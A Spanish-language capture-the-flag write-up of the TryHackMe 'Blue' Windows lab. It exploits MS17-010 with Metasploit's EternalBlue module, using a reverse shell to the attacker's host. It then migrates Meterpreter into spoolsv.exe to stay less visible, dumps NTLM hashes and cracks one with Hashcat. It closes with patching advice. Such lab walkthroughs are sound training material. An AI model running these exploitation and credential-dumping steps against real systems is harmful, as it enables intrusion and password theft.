Volver a Writeups
TryHackMe Easy 🪟 Windows

Blue

Blue es una máquina Windows clásica vulnerable al exploit EternalBlue (MS17-010), la misma vulnerabilidad usada por el ransomware WannaCry. Se explota con Metasploit para obtener acceso como SYSTEM directamente. Luego se extraen hashes NTLM con hashdump, se migra el proceso para estabilizar la sesión y se descifran las contraseñas con Hashcat.

EternalBlue MS17-010 Metasploit Meterpreter NTLM Hash Hashcat

Reconocimiento

bashnmap — puertos SMB Windows
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server (RDP)

Detección de MS17-010

bashNetExec — verificar vulnerabilidad
nxc smb 10.67.141.205 -M ms17-010
# [+] SMB 10.67.141.205 445 BLUE  [*] Windows 7 Professional 7601 x64
# [+] VULNERABLE to MS17-010

Explotación — EternalBlue con Metasploit

bashMetasploit — exploit MS17-010
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.67.141.205
set LHOST TU_IP
set LPORT 4444
run

# Resultado: shell como NT AUTHORITY\SYSTEM (máximos privilegios directo)

Post-Explotación — Meterpreter y Hashdump

Upgradeamos la shell básica a Meterpreter para tener más capacidades:

bashShell → Meterpreter
# Mandar sesión al background
Ctrl+Z

# Upgradear a Meterpreter
sessions -u -1
sessions -i 2  # entrar a la nueva sesión Meterpreter

Migración de proceso para estabilidad

Para estabilizar la conexión, migramos a un proceso del sistema más robusto. spoolsv.exe (cola de impresión) es ideal: es estable, espera comunicación externa y es menos vigilado que lsass.exe o services.exe.

meterpreterMigración de proceso
ps  # listar procesos
# buscar spoolsv.exe y tomar su PID

migrate [PID_DE_SPOOLSV]
# [*] Successfully migrated to process

Extracción de hashes NTLM

meterpreterhashdump
hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

El formato es Usuario:RID:LM_Hash:NTLM_Hash:::. El hash interesante es el de Jon (NTLM): ffb43f0de35be4d9917ac0cc8ad57f8d.

Cracking del Hash NTLM — Hashcat

bashHashcat ataque de diccionario
echo "ffb43f0de35be4d9917ac0cc8ad57f8d" > hash_jon.txt

hashcat -m 1000 -a 0 hash_jon.txt /usr/share/wordlists/rockyou.txt
# -m 1000: tipo NTLM
# -a 0: ataque de diccionario

# Resultado: alqfna22

Flags

  • Flag 1: C:\
  • Flag 2: C:\Windows\System32\config
  • Flag 3: C:\Users\Jon\Documents

Lecciones Aprendidas

  • MS17-010 (EternalBlue) es una vulnerabilidad crítica en SMBv1. Windows 7 y Server 2008 sin parches son susceptibles. Siempre parchear o deshabilitar SMBv1.
  • Los hashes NTLM pueden crackearse con diccionarios en segundos para contraseñas simples. Usar contraseñas complejas y autenticación multifactor.
  • Meterpreter es una herramienta post-explotación muy poderosa pero también muy detectada por EDRs modernos.
  • La migración de procesos en Meterpreter es importante para persistencia y para evitar que la sesión muera cuando el proceso original termina.
blue